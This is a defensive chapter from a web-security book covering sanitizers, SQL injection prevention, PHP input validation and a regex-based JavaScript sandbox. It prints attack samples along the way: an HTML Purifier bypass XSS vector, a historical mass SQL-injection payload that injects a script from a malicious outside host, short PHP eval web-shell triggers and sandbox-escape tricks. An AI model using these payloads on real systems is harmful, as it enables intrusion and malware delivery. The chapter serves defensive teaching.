Chapter 9. Mitigating bypasses and attacks
Information in this chapter:
• Protecting Against Code Injections
• Protecting the DOM
Abstract
Thus far in this book, the discussion has centered on how to break existing filters, create strings that bypass firewall and filter rules, and trick devices into doing things they are not supposed to do. Throughout this discussion, the focus has been on offensive computing, as opposed to defensive computing and protection, with the idea being that it is more beneficial to developers to know how to attack a Web application than it is to blindly learn how to defend it. In this chapter, the authors deviate from the course a bit and focus on defensive computing. In particular, the authors teach and discuss best practices that you can use to harden and secure Web applications a bit more thoroughly than what blogs and tutorials generally teach. In addition to explaining how to protect against code injections (including server-side injections), they discuss how to protect the DOM, detect arrays, and proxy functions.
Key words: Code injection, HTML injection, Cross-site scripting, Markdown, Sandboxing, Proxying
In the preceding chapters of this book, we discussed how to break existing filters, create strings that bypass firewall and filter rules, and trick devices into doing things they are not supposed to do. We discussed how to execute JavaScript with CSS, how to create and execute nonalphanumeric JavaScript code, and how to combine all of these with server- and client-side databases to identify the numerous ways in which attackers can execute code, even on systems that are supposed to be secure. Throughout this discussion, our focus has been on offensive computing, as opposed to defensive computing and protection. We, the authors of this book, believe that knowing how to attack a Web application is very important—more important than blindly learning how to defend it. We also believe there is no best way to protect Web applications from being attacked and from suffering the impact of those attacks.
Web applications are complex. Some are so complex that they require large teams comprising upward of 50 people working on them every day, adding new features, fixing bugs, and testing, maintaining, and browsing the stats. It is almost impossible to find a golden path toward secure applications in this manner. Many features require unique solutions, some of which are very hard to test or even understand. Also, small applications can be so complex that it is not unusual for them to be quite buggy. According to Steve McConnell, in his book Code Complete (http://cc2e.com/), there can be anywhere from 15 to 50 bugs per 1000 lines of code in average, industry-level software products (http://amartester.blogspot.com/2007/04/bugs-per-lines-of-code.html). It is impossible to create software without bugs, and the more complexity we are faced with the more problems and errors we can expect.
Despite all these, we, the authors, decided to include in this book a chapter focusing on defense. We did this for many reasons. The first reason is to teach and discuss best practices that you can use to harden and secure Web applications a bit more thoroughly than what blogs and tutorials generally teach. As a matter of fact, a lot of publicly available examples showing how to build certain Web application features are incredibly buggy and insecure, including countless blog posts, comments, and code examples in the PHP documentation (www.php.net/manual/en/), and even tutorials on securing Web applications. For example, in late 2009, Alex Roichman and Adar Weidman proved that the regular expressions shown in the Open Web Application Security Project (OWASP) Validation Regex Repository (www.owasp.org/index.php/OWASP_Validation_Regex_Repository) were vulnerable to denial-of-service attacks.
This chapter discusses best practices for securing Web applications and pinpoints common mistakes developers tend to make in this regard. This will be interesting knowledge for both developers and attackers who have no development background, and thus often do not know how Web developers think and work. This is often half the battle in terms of finding Web application bugs in a more efficient manner. Experienced penetration testers and attackers often just have to see a particular feature to know that it is vulnerable—or is likely to be vulnerable.
We start with a discussion of general code injections—cross-site scripting attacks as well as code injections and similar attacks.
Protecting against code injections
Code injections can occur on all layers of a Web application and can include everything from DOM injections and DOM cross-site scripting, to classic markup injections, CSS injections, and code execution vulnerabilities on the server-side layer, to attacks against the database or even the file system via path and directory traversal and local file inclusions. There is not a single layer in a complex Web application in which an attacker cannot use strings or similar data to cause trouble and interfere with the expected execution flow and business logic. In this section, we do not focus on securing every layer of a Web application; other books are already available that discuss Web security and hardening Web applications against attacks of all kinds. Instead, we focus on best practices and interesting tools that can help us to harden a Web application, discuss how to deal with the consequences of a successful attack, and delve into details regarding the attack surface activity of a Web application.
HTML injection and cross-site scripting
One of the most common attack scenarios concerns exploitation of the display of unfiltered user input—coming in via GET, POST, COOKIE, or other client-to-server messages that the user can influence manually or with a tool. In this scenario, an attacker has to check where his input is being reflected and which characters the Web application filter is allowing. Sometimes there is no filter at all; sometimes the filter just encodes or strips certain characters or strings; and sometimes the filter uses a complex validation mechanism that has knowledge about the context in which the input is being reflected and then executed. The term context is important in this discussion. It is easy to harden a Web application against user input that could result in markup injections or cross-site scripting and JavaScript execution. A developer would just have to make sure each incoming string is encoded to an HTML entity before being reflected. This approach would work perfectly—as long as the attacker does not have the ability to inject input into the HTML element, because the browser accepts HTML entities at this location (as we learned in Chapter 2). However, a complex Web application cannot just rigorously encode any incoming data to entities. Sometimes, the Web site owner wishes to allow users to use HTML for text formatting; other times an abstraction layer for creating HTML text, such as BBCode (www.bbcode.org/) or similar markdown dialects, are being used.
Markdown is a markup language abstraction layer that is supposed to provide a limited and easy-to-use set of text formatting helpers. Several dialects and variations of markdown exist, and are used in the MediaWiki software, Trac, many bulletin boards such as phpBB and vBulletin, as well as blogs and wikis.
More information on markdown is available at http://daringfireball.net/projects/markdown/.
In this situation, a developer is faced with a dilemma: Either the user can submit HTML, and thus the whole Web application will be rendered vulnerable to cross-site scripting or worse; or the requirement cannot be fulfilled, resulting in sad users and Web site owners. What is necessary in this case is an easy-to-describe but difficult-to-build layer between the Web application and the user-generated data. A tool with this capability would know all about HTML, browsers, and rendering quirks. It would be able to decide whether the submitted HTML is harmless or potentially dangerous; even fragments of dangerous HTML could be detected and, in the best case, removed. Chapter 2 should have taught you that this feat is quite challenging. Still, many developers have faced this challenge and attempted to create “aware” filtering tools. Google uses such a filter, and from what we, the authors, could see during our research, it is pretty tight and almost invincible. Microsoft also has a solution, called Safe HTML, which works quite well too. Meanwhile, PHP developers should investigate the HTML Purifier (http://htmlpurifier.org/) and Java folks should look into the OWASP AntiSamy project (www.owasp.org/index.php/Category: OWASP_AntiSamy_Project).
In essence, each of these tools parses the user-submitted markup and checks for tag-attribute combinations that could execute JavaScript code, interfere with client-side layout rendering such as base or meta tags, or embed arbitrary sources via object, applet, iframe, and embed.
Many of these tools are also capable of parsing CSS to make sure no evil styles can be smuggled into the submitted markup. The tools do this via whitelisting. In essence, the tools contain a list of known good; anything that is not on this list is stripped or manipulated to prevent any negative effects. (By the way, blacklists would fail at this task, since there are endless combinations of invalid or unknown tags and XML dialects for generating code executing JavaScript or worse.) HTML Purifier even completely rebuilds the user-submitted markup after analysis to make sure an attacker cannot use encoding tricks and other behavior to inject bad code, as we discussed in Chapters 2, 3 and 5. Nevertheless, bypasses sometimes do exist because user agents do not follow the defined standards for working markup. A recently discovered bypass that works against HTML Purifier and Internet Explorer 8 looks like this:
<a style=“background:url(/)!!x:expression(write(1));”>lo</a>
In the preceding code, the vector abused a parser bug in IE8 and earlier that is connected to the exclamation mark in the middle of the vector. HTML Purifier did everything correctly, but had no knowledge of the parser bug. This immediately rendered many Web applications vulnerable to cross-site scripting, and even bypassed PHPIDS attack detection in some scenarios since it relies on HTML Purifier too.
CSS parsers are, by design, very error-tolerant. This is due to the extensible nature of the CSS styling language. If the parser comes across an element in a stylesheet that it does not recognize, it should continue until it finds the next recognizable element. In the past, this led to many severe security problems that affected all browsers. Arbitrary garbage followed by a {} sequence will make most CSS parsers believe valid CSS is present.
Cross-site scripting attacks are not the only danger resulting from abusing a browser's CSS parser. Severe information theft is also possible, as described in the paper “Protecting Browsers from Cross-Origin CSS Attacks” by Lin-Shung Huang, Zack Weinberg, Chris Evans, and Colin Jackson (see http://websec.sv.cmu.edu/css/css.pdf).
This problem was partially resolved in HTML Purifier 4.1.0 and fully resolved in HTML Purifier 4.1.1. So, as you can see, the task of cleaning markup of bad input is difficult to almost impossible. Too many layers are included in the process of submitting, reflecting, and processing user-generated markup. And not only must the filtering solution be equipped with knowledge regarding what HTML is capable of but also it is important to know about bugs, glitches, and proprietary features in the user agents rendering the resultant markup.
But, of course, there is more to Web application security and code injection than just client-side reflected code via bad server-side filters. Let us look at some of the protection mechanisms that are available to protect server runtimes such as PHP and the database.
Server-side code execution
There are dozens of techniques and even more attack scenarios and vulnerability patterns when it comes to executing code on the server via vulnerabilities in a Web application. In this section, we revisit those we discussed in Chapters 6 and 7.
SQL
The topic of SQL injections is vast, and there is a lot more to learn about it than what we have the space to cover here. For more information on SQL injection, see Justin Clarke's book, SQL Injection Attacks and Defense (ISBN: 978-1-59749-424-3, Syngress), as well as any of the numerous online tutorials that teach how to secure Web applications against SQL injections, perform SQL injections, avoid filter mechanisms, and defeat the signatures of Web application firewalls (WAFs). In addition, several good SQL injection cheat sheets are available, some of which we covered in Chapter 7. Also, a variety of tools are available to attackers and penetration testers for testing Web applications against SQL injections. These include the free and open source sqlmap (http://sqlmap.sourceforge.net/) and sqlninja (http://sqlninja.sourceforge.net/), and the commercial tool Pangolin (www.nosec.org/), which some say is the best and most aggressive tool on the market. Rumor has it that the free test version of Pangolin is backdoored; this was discussed on the Full Disclosure mailing list in early 2010 (http://seclists.org/fulldisclosure/2008/Mar/510).
SQL injections are a very common and persistent problem, with sometimes dire consequences. Depending on the attacked system and the underlying database management system (DBMS), the consequences can range from heavy information disclosure to denial of service and even remote code execution on the attacked box.
Also, if the SQL injection vulnerability occurred in a popular third-party software product, attackers could easily turn it into a mass SQL injection attack by simply using Google to locate other Web sites that use the affected software and shooting malicious queries at all of them.
Once a SQL injection vulnerability has been spotted on a specific Web site, the attacker can take a lot of time probing and disclosing important information about the DBMS, the currently installed version, and most importantly, the set of privileges the database is running with to determine what to do next and how to accomplish her goals. If the attacked system is protected with a WAF that, for example, will not allow easy probing attempts such as the common string ‘OR1=1 –, or similar vectors, the attacker does not have to give up, because now the real fun begins. The fact that SQL is extremely flexible in its syntax due to its comparably simple nature leads to the possibility of obfuscating the attack vector to the max. We saw many examples of how to do this in Chapter 7. A good indication that a WAF is present is if an attacker submits the aforementioned string and the server responds with a result such as the 406 status code, “Not Acceptable.”
A tool called wafw00f is available that helps to fingerprint WAFs in case an attacker suspects a WAF is present. The tool fires several easy-to-detect vectors against the targeted Web application and inspects the resultant response, both the header and the body. If the response matches several stored patterns, the tool tries to calculate the probability that a WAF is being used. Most of the time the results are pretty precise. You can find the tool at http://code.google.com/p/waffit/.
The attacker would then vary the attack vector a bit; for example, she may try using MySQL-specific code or other obfuscation methods such as nested conditions or internal functions to generate the necessary strings and values. Since SQL is flexible, there will always be a way to get around the string analysis and filtering methods of the installed WAF or filter solution. Use of the term always in the preceding sentence might raise a few eyebrows, but so far none of the products we, the authors, tested while writing this book were able to catch all SQL injection attempts. At some point, all WAFs failed; even the heavily maintained PHPIDS is not remotely capable of catching all SQL injection attempts and has been regularly fooled by researchers such as Roberto Salgado and Johannes Dahse (http://sla.ckers.org/forum/read.php?12,30425,page=29).
So, the only way the developer of a Web application can protect the application against SQL injections is by not making any mistakes and not creating any vulnerabilities. Fortunately, there are some techniques a developer can use to make this task a bit easier. One of them is to use parameter binding, and thereby avoid concatenating strings while building the query. Concatenation-based bugs are the most common SQL injection vulnerabilities out there at the time of this writing, but few incidents have been reported in which applications were affected that used proper binding methods. PHP and many other languages provide libraries that enable easy use of parameter binding for building SQL queries, and it is not hard to test and implement. If you cannot get around concatenation, you should use proper filtering and escaping methods. PHP's mysql_escape_string() and mysql_real_escape_string() do a good job and work quite reliably.
Another way to go is with stored procedures and functions, whereby the developer can outsource a lot of application logic directly to the DBMS. The MySQL documentation calls them stored routines and provides good information on them in the reference docs (see http://dev.mysql.com/doc/refman/5.1/en/stored-routines.html).
With this technique, the user-submitted data can be wrapped in variables and later used in the final query. If this is done correctly, it provides good protection against SQL injections since the attacker cannot leave the context of the mapped variable, and thus cannot break out the query's structure and add new code. Simple and blind use of stored functions is no guarantee of a system that is safe from SQL injections, though, as illustrated in an incident that occurred in early 2008. One of the affected stored procedures looked like this:
DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype=‘u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update [‘+@T+’] set [‘+@C+’]=rtrim(convert(varchar'[‘+@C+’]))+‘’<script src=http://nihaorr1.com/1.js></script>‘’')FETCH NEXT FROM Table_Cursor INTO @T’@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
The attackers used the fact that the stored Microsoft SQL procedure used internal concatenation, and thus managed to break the code and inject their own data. The injected code was reflected on the affected Web sites and displayed a script tag loading data from a malicious URL attempting to infect the visiting users with malware—the antiquarian Microsoft Data Access Components (MDAC) exploit which, at the time of this writing, is still being sold as part of common underground exploit kits. Good write-ups on this incident are available at the following URLs:
Another interesting way to protect Web applications from SQL injection attacks is to use a SQL proxy solution such as GreenSQL (www.greensql.net/). Tools such as this free open source product create a new layer between the application and the DBMS. If the application messes up the filtering job and directs potentially malicious and unsolicited SQL to the DBMS, the SQL proxy becomes the last line of defense and checks the incoming data, matches it against existing profiles and filter rules, and acts as a bridge keeper. As soon as the proxy tool judges the input to be harmless and valid it will pass it; otherwise, an error will be thrown and the DBMS will remain unaffected. The problem with solutions such as this is that, like WAFs, they are easy for attackers to fingerprint, and if an unpublished vulnerability or bypass exists, the protection mechanisms are rendered completely useless. Also, the tool itself may contain a vulnerability that leads to a bypass of the protection, or even worse. Several WAFs have fallen victim to attacks against their own backend system in the past.
So, as you can see, protecting Web applications from SQL injections with external tools might work in some cases, but definitely not in all. It is easy to advise developers to make no mistakes and bind properly, use no concatenations, and do everything right, but it is difficult for developers to actually do these things. And if third-party software is used, the Web application's security level basically relies on the expertise of the developers of the third-party software, or on thorough audits which can take weeks to months to complete in some scenarios. Furthermore, sometimes the DBMS and the runtimes are third-party solutions which can contain bugs too. So, even if the Web application and everything around it is set up properly, its security depends on factors such as the DBMS security, operating system security, and many other factors.
PHP
Creating a code execution vulnerability in PHP is not the most difficult task for an inexperienced developer to perform. And from the perspective of the attacker, PHP vulnerabilities are very attractive, since executing PHP code basically means owning the box on which it is running. If that is not the case due to a thoroughly hardened server, at least the application, perhaps neighboring applications on the same server, and the database can be overtaken and controlled by spamming or abusing the conquered machine's mailer, thereby causing heavy information disclosure and severe privacy leaks for the user of the victimized application. PHP code execution vulnerabilities are pretty easy to find; usually they incorporate several native functions in combination with unsanitized user input.
Tools such as the Google Code Search Engine facilitate the process of finding code execution vulnerabilities. An attacker just creates a search term that matches common vulnerability patterns and sees which open source third-party software is being affected. Then he simply uses the regular Google search engine to search for domains hosting the files based on the results of the first code search. At this point, the exploitation can begin, and on a large scale.
Code search engines are more dangerous than they might appear, since searching for code in general via regular expression-based patterns means searching for vulnerabilities too. To see how easy this is, and how many results are reflected in even the easiest and most basic search patterns, try the following query on the Google Code Search Engine (www.google.com/codesearch). At the time of this writing, the query reflected 455 results, a large percentage of which are useful to attackers:
lang:php eval\s*\(.*\$_(GET|POST|COOKIE|REQUEST)
It may sound too easy to be true, but this really is what happens. Most of the attacks coming in via the php-ids.org Web site attack logs indicate that the attacker's goal was code execution using the simplest vectors. Often, the already infected machines are being used to scan the Web for more machines to infect, all via an initial PHP code execution vulnerability. Remember, the attacker can do everything the attacked application can do, including sending e-mails, scanning the Internet, sending requests to other Web sites, and more.
The easiest way for a developer to create a code execution vulnerability is to combine include and require statements with user input. Imagine a piece of code such as include ‘templates/’.$_GET[‘template’].’.tpl’;. If the PHP runtime is not very well configured, this example can be exploited as a code execution vulnerability. In the worst-case scenario, the attacker can cut the string by using a null-byte and do a path traversal to another file located on the attacked server. If this file contains PHP code controlled by the attacker, the potential code execution vulnerability will be completely exploitable.
Infecting an arbitrary file on the attacked server with attacker-controlled PHP code is also easier than you might think. Consider, for example, uploads of PHP code in GIF comments or just plain-text files, PDF files, or Word documents; or perhaps log files, error logs, and other application-generated files. Some attackers claim to have used the mail logs generated by a Web site's mailer, or the raw database files in some situations. Also consider the data URIs and PHP wrappers we discussed in Chapter 6; these were also very interesting and promising ways to infect a file with attacker-controlled PHP code. The code such a file should contain can be very small; basically, just a small trigger to evaluate arbitrary strings, such as <?eval($_GET[_]);. In just 17 characters, an attacker can execute arbitrary code, just by filling the GET parameter _ with, for example, echo ‘hello’; or, more likely, something worse. If you use back ticks, it's even possible to create shorter trigger vectors if the surrounding code allows it. Code such as <?$_GET[_](); even allows you to call arbitrary functions with 13 characters, if they do not require any parameters, and <?$_($x); as well as <?'$_'; do the same if the PHP setting register_globals is switched on. (These vectors were submitted by Twitter users @fjserna, @freddyb, and @ax330d.)
What can a developer do to protect against such attacks? The answer is simple: proper validation. Proper validation is crucial for fixing and avoiding security problems and vulnerabilities. Developers should make sure that the user-generated content is being validated strictly before hitting any critical function or feature. Let us revisit the small include example we saw earlier in this section. If the developer had made sure that only alphanumeric characters could enter the concatenated string later being processed by the include statement, everything would have been all right. This is also true for native PHP functions such as escapeshellcmd which, for some reason, is blocked by many large hosting companies, and preg_quote, which does a pretty good job of making sure no bad characters can be put into a string without being escaped with a backslash.
Validation and escaping are very important, but validation is more important than escaping because input that does not pass validation no longer has to be escaped. The script will simply not let it pass, and instead will show error information or something more user-friendly. But again, we are talking about software that developers have under their control; in other words, software they, their team members, or their former coworkers wrote. As we discussed, third-party software throws a monkey wrench into the works: How can a developer know if everything in, for instance, a huge project such as phpBB or MediaWiki was done correctly? What if one of the major open source projects does not provide the features the site owner needs, and a less popular and less well-maintained solution has to be used? In these situations, it might not always be possible to conduct long and costly audits against the third-party software. Therefore, the best approach is a global filtering solution sitting right in front of the PHP code and executing scripts before the actual application does. Luckily, PHP provides such a mechanism. It is called auto_prepend_file and it is documented at http://php.net/manual/en/ini.core.php.
This mechanism allows developers to, for example, look at _GET, _POST, and other super-global variables before they hit the application, and perform some sanitation work for the sake of better security. One recommended action is to get rid of null-bytes; it is best to replace them with spaces or other harmless characters. Invalid Unicode characters are another group of evil chars one might want to get rid of—the whole range from\x80 to \xff if the application runs on UTF-8—because they can cause serious problems with cross-site scripting if the application uses the native PHP function utf8_decode somewhere in the guts of its business logic. Another trick is to use some predictive validation combined with auto_prepend_file. A parameter named id or containing the string _id most likely contains either a numerical value or a string with the characters a-F and 0-9, so why not auto-magically validate it that way? If the parameter does not contain the expected characters, the prepended file will exit and will show an error message. Chances are very good that most, if not all, third-party software you use will work well with such a restriction.
Securing PHP from more or less obfuscated attacks is hard and is not a task that your neighbor's son should perform for you, unless he is really good in his field of research. Sometimes code execution vulnerabilities appear where no one would ever expect them—for example, the BBCode PHP remote code execution vulnerability in the legendarily vulnerable content management system e107 (see http://php-security.org/2010/05/19/mops-2010-035-e107-bbcode-remote-php-code-execution-vulnerability).
There are many ways you can protect your PHP applications; you can forbid certain functions, use the deprecated and many times exploited and bypassed safe_mode, and set other important options in the php.ini or vhost configuration or.htaccess files around the Web application, besides following the numerous guidelines of writing secure code. But the most important thing is still proper encoding, filtering, and most importantly, thorough validation. The more centralized and strict the validation, the better. Only allow the characters that are supposed to be used; the least-privilege policy reigns supreme in the world of PHP.
Now let us look at a completely different topic: protecting the DOM and other client-side entities, because at some point, Web applications will have to be able to deal with user-generated JavaScript, a task that is almost impossible to master.
Protecting the DOM
As we saw in Chapters 3 and 4, JavaScript can be obfuscated to the extreme, and the syntax is very flexible. This makes it difficult to protect JavaScript code entirely, as one little slip and you can expose access to the window or document object. To protect the DOM, we have to learn to hack it. We, the authors, started on this journey awhile ago, and at first we thought it was straightforward to protect the DOM by simply using closures and overwriting methods. Our code looked something like this:
window.alert = function(native) {
var counter = 0;
return function(str) {
native(str);
if(counter > 10) {
window.alert = null;
}
counter++;
}
}(window.alert);
The reasoning was if we could control the original reference, we could force the function to do what we wanted: which, in the preceding example, was to have a limit of 10 calls. The main problem with this approach is that there are numerous ways to get the original native function. Another problem is that we are forced to go down the blacklist route; we have to specify all the native functions to protect, and if a new one is released we have to add it to our sandbox. Therefore, new JavaScript features would break our method. This is clearly demonstrated with one line of code; using delete we can get the native function on Firefox:
window.alert=function(){}
delete alert;
alert(alert);//function alert() {[native code]}
Another technique on Internet Explorer is to use the top window reference to obtain the original function, as shown in the next example:
var alert = null;
top.alert(123);//works on IE8
Not giving up, we pursued another method, this time creating two windows on separate domains and using Same Origin Policy (SOP) to prevent access to the calling domain. We did this by sending the code using the location.hash feature in JavaScript and reading it from the separate domain, executing the code, and sending it back to the original domain. This seemed to work; it had some advantages, such as being able to set cookies on the domain used and the ability to redirect the user, but it was flawed. Using new windows, it was possible to break the sandbox and execute code on the parent domain. If we wanted to protect the DOM, we would have to sandbox all functions and control what the user could access.
Sandboxing
The Web has evolved since we, the authors, conducted that test, and the brilliant SOP is now outdated. The policy now states that different domains should not be able to access the content unless both domains match. This worked great for Web applications in the 1990s and early 2000s, but as Web applications have evolved, the restrictions of SOP have become apparent. Web sites are no longer restricted to their own domains; they are combined to form mashups, in which data from one site can be used by another site to create a new application. Even user-created applications can be accepted on some Web sites such as Facebook. This presents a problem for SOP, because if we are accepting untrusted code, how can we be sure a user is not doing something malicious with it?
To solve this problem, companies such as Google, Microsoft, and Facebook have started to develop their own sandboxes, such as Caja (http://code.google.com/p/google-caja/) and the Microsoft Web Sandbox (http://websandbox.livelabs.com/). These are designed to allow Web sites to include untrusted code and execute the code in their own environment, choosing what the code should be allowed to do.
Although this sounds great, the footprint is high, and sometimes involves a server layer or plug-in to parse the code safely. We thought this could be done with less code and just the client.
Gareth (one of the authors of this book) decided to create a regular expression sandboxing system based entirely in JavaScript. This journey started when he was writing a simple JavaScript parser that could accept untrusted code. After around 100 lines of code, he realized that instead of writing multiple if or switch statements, he could use a regular expression as a shortcut to define more than one instance or range of characters. He soon realized that it would make sense to simply match the code and rewrite it as necessary, and then let the browser execute the rewritten code. From this, JSReg was born.
JSReg is a JavaScript regular expression sandbox that performs rewriting to make untrusted JavaScript code safe (www.businessinfo.co.uk/labs/jsreg/jsreg.html).
One of the challenges of sandboxing JavaScript is the square bracket notion. Literally, any statement can be placed within a pair of square brackets and the result is used to determine which object property to access. For example, the property __parent__ would return the window object on Firefox. We cannot allow access to window as we would then have access to the various methods and the ability to create global variables. Another challenge is that the square bracket notation shares the same syntax as an array literal. We want to detect both, as we will do different rewrites depending on whether the script we are detecting is an array or an object accessor.
The square bracket notation in JavaScript is also called object accessor.
Let us see how an array literal and object accessor compare.
arrayLiteral = [1,2,3];
obj={a:123};
objAccessor=obj[‘b’,‘a’]
As you can see in the preceding code, they are very similar; the object accessor looks like an array, even though it only returns the result of the comma operator. The last statement, meanwhile, is always returned by the object accessor. We could, in effect, rewrite the preceding code sample as obj[‘a’] as the string ‘b’ is redundant.
Detecting arrays
At first, and rather naively, we thought we could detect arrays using regular expressions. However, the main difficulty of detecting arrays in this manner is that regular expressions in JavaScript struggle to match recursive data. Any data that repeat itself will be overlapped by either greedy or lazy matching, which will result in security problems and syntax errors. The lack of look-behind functionality in JavaScript for regular expressions adds to the difficulty of matching an array literal correctly. Therefore, the best way we came up with to resolve this issue was to rewrite the arrays and place markers where they occur. With this technique, @# indicates a special array marker; we chose this to create invalid syntax so that it could be maliciously added. To match the open bracket and ending bracket, we used a simple counter which incremented when one was opened and decremented when one was closed. Using this method, it is possible to detect each pair of characters by matching the highest closing character with the lowest opening character. In addition, the left context of the match was added manually each time so that we could see which characters came before the opening character to decide if the character was an array literal or an object. You can see the entire process in action via the convenient Google code interface on which JSReg is hosted (https://code.google.com/p/jsreg/source/browse/trunk/JSReg/JSReg.js?spec=svn62&r=62#897).
Once we have detected our arrays and placed the markers, we can replace them with a function call that creates an array. This successfully separates array literals and objects. You might be wondering why markers are used at all. Well, the marker provides a constant that cannot be overwritten before a rewrite has been performed. If, for example, we chose to use a instead of a marker, the malicious code could overwrite all calls to create arrays by supplying a custom function for a. Using an invalid syntax marker, we can prevent this because if an attacker chooses to inject the marker, it will be rejected as a JavaScript error when JSReg performs a syntax check.
Look-behind allows a regular expression to look backward without adding to the text of the match, but it can also be used if a condition is matched. For example, if we were to negatively look behind for a, our regular expression would only be matched if the text before the match didn't contain a.
Code replacement
Using code replacement allows you to use the executing environment such as a browser, but enables you to whitelist the code that can be executed. This solves the problem of the sandboxing system breaking when new features are added to the language. Using a blacklist method, you may forget one little detail that would enable a sandbox escape.
The basic design of the rewriting code replacement layer is to perform a global regular expression match without using starting anchors such as ˆ or ending anchors such as $. It works by using the replace function in JavaScript to scan for each regular expression supplied in turn. Without a specific starting point, it just continues through the text until it finds one. The basic design is as follows:
“match1match2match3”.replace(/(match1)|(match2)/g, function($0, $match1, $match2) {
if($match1 !== undefined && $match1.length) {
alert($match1);
} else if($match2 !== undefined && $match2.length) {
alert($match2);
}
});
The single regular expressions are grouped together, so each individual match inside the regular expression indicates an operator, a literal, or whatever you want to match. Each group is assigned a variable which is prefixed with $ to indicate it is part of a regular expression match. The if statements are required to get around how some browsers define the matches from the regular expressions. This a very powerful method of sandboxing because each match can then be worked on again or replaced. The whitelisting method was simple; instead of allowing variables as supplied by the user, we replace them with a prefix of $ and a suffix of $. Therefore, the variable window becomes $window$.
Handling objects
We have got arrays covered and we are whitelisting our code, but what about the stuff we cannot whitelist, such as code that is calculated dynamically and code to which we cannot assign a prefix and suffix because we do not know the result until after the code has run? For dynamically calculated values, we need to add a run-time function that provides a prefix and a suffix. The following code shows why values are not known until execution:
prop='a';
obj={a:123};
obj[prop];
Replacing the obj[prop] value with obj[‘$prop$’] will return an incorrect value for the original code. To continue our sandboxing, we must change the replacement to call our function to calculate the correct property at run time. Here is what obj[prop] looks like after our replacement:
obj[runtimeFunc(prop)];
In this way, we can control the result of any code inside square brackets. The runtimeFunc will add a prefix and suffix of $ to the code. Provided that the attacker cannot modify our function and that the replacement always occurs we can always ensure that the property will always be sandboxed.
Layers
To mitigate attacks, it is important to layer your defenses and expect your defenses to be broken. In this way, your sandbox will be harder to break. For example, you can use replacements to force a whitelist, perform error checking on supplied code, and check if a window object leaks. Looking back over the previous exploits of JSReg, the layered defense often prevented further attacks and minimized the damage of the sandbox escape to global variable assignments.
Proxying
Once a sandbox is in place, the next step is to proxy existing functions that we want to allow access to. When proxying functions you need to consider object leakage and any calls to the DOM. An issue in Firefox to look out for is native objects leaking window; this issue could be applied to other browsers in the future, so it is worth applying a proxy function in every browser. A closure is a good choice when creating a proxy function, as you can supply any global objects a function has access to without exposing the window object. The variables passed to the closure are sent before the proxied function is defined. The following code shows a function proxy:
<script type=“text/javascript” src=“http://jsreg.googlecode.com/svn-history/r62/trunk/JSReg/JSReg.js”></script>
<script type=“text/javascript”>
window.onload=function() {
var parser=JSReg.create();
parser.extendWindow(“$alert$”, (function(nativeAlert) {return function(str) {
nativeAlert(str);
}})(window.alert));
parser.eval(“alert(123);alert(alert);”);
}
</script>
In this instance, the extendWindow method allows you to add methods to a sandboxed window object that is really named $window$ and that follows our prefix and suffix. Notice that we name our function $alert$ and that the eval'd code is alert. As we discussed in the “Code Replacement” section earlier, all code supplied to the sandbox is replaced with the prefix and suffix, so alert becomes $alert$. We use the closure to send the native function alert to our proxy function where we can call the native whenever we like and perform any checks before the actual native is run. In a real-world situation, we might limit the number of alerts that can be called to prevent a client-side denial of service. We can do this within the scope of our proxy function.
A closure is a function that returns a function. It is a powerful programming technique and is very useful for sandboxing.
Proxying assignments is quite difficult if you want to maintain compatibility with older browsers as the technique requires some form of setter syntax. Getters and setters are supported in Firefox, IE8, Chrome, Opera, and Safari, but not in earlier versions of Internet Explorer, or at least not in a standard form. From a sandboxing point of view, you might want to intercept assignments such as document.body.innerHTML in Firefox, Chrome, Opera, or Safari. You can use __defineSetter__ syntax in JavaScript (https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object/defineSetter). This function takes two arguments: the name of the property that you want the setter to be called on and the function that will be called. The setter function will be passed one argument of whatever has been assigned. ECMAScript 5 introduced a new way to perform setter assignments using the defineProperty function (http://msdn.microsoft.com/en-us/library/dd229916%28VS.85%29.aspx). This method is far more powerful than the nonstandard __defineSetter__ syntax. One reason for this concerns control over the object. Instead of supplying two arguments, you provide a property descriptor. This allows you to define a setter, a getter, and how the properties can be used (e.g., making nonenumerable properties).
To be compatible with earlier versions of Internet Explorer such as IE7, we can use nonstandard functionality that can be used to emulate setters. The onpropertychange event (http://msdn.microsoft.com/en-us/library/ms536956%28VS.85%29.aspx) calls a function when a DOM object, usually an HTML element, has an attribute modified. Putting all this together, we can create setter emulation which works in the majority of browsers. Gareth (one of the authors of this book) created a sandboxed DOM API which combines all of these techniques to successfully intercept DOM assignments. The following URL shows how to use feature detection and fallbacks to provide the most compatible way to listen for these assignments:
The most recent feature is detected first, so if the browser supports Object.defineProperty this test will be passed first; then Object.__defineSetter__ is checked, and as a fallback, it is assumed that onpropertychange will be supported. If this actual code fails, it will fail gracefully as it will simply be ignored by browsers that don't support it. There is an interesting problem in IE8's support of the defineProperty syntax; it only supports DOM elements and not literal JavaScript objects. This presents a problem for sandboxed code because, for example, if a sandboxed object was checking for styles being assigned to a style property, as our previous code sample shows, it would not be called. Unfortunately, the hack around this is quite ugly; you have to create an empty tag and use that object to check assignments:
var styles = document.createElement(‘span’);
node[‘$‘+‘hasChildNodes’+‘$’] = node[‘hasChildNodes’];
node[‘$‘+‘nodeName’+‘$’] = node[‘nodeName’];
node[‘$‘+‘nodeType’+‘$’] = node[‘nodeType’];
node[‘$‘+‘nodeValue’+‘$’] = node[‘nodeValue’];
node[‘$‘+‘childNodes’+‘$’] = node[‘childNodes’];
node[‘$‘+‘firstChild’+‘$’] = node[‘firstChild’];
node[‘$‘+‘lastChild’+‘$’] = node[‘lastChild’];
node[‘$‘+‘nextSibling’+‘$’] = node[‘nextSibling’];
node[‘$‘+‘previousSibling’+‘$’] = node[‘previousSibling’];
node[‘$‘+‘parentNode’+‘$’] = node[‘parentNode’];
for(var i=0;i<cssProps.length;i++) {
var cssProp = cssProps[i];
if(Object.defineProperty) {
node.$style$ = styles;
Object.defineProperty(node.$style$, ‘$‘+cssProp+‘$', {
set: (function(node, cssProp) {
return function(val) {
var hyphenProp = cssProp.replace(/([A-Z])/g,function($0,$1) {
return ‘-’ + $1.toLowerCase();
});
var safeCSS = CSSReg.parse(hyphenProp+':’+val).replace(new RegExp(‘ˆ‘+hyphenProp+‘[:]’),’').replace(/;$/,’');
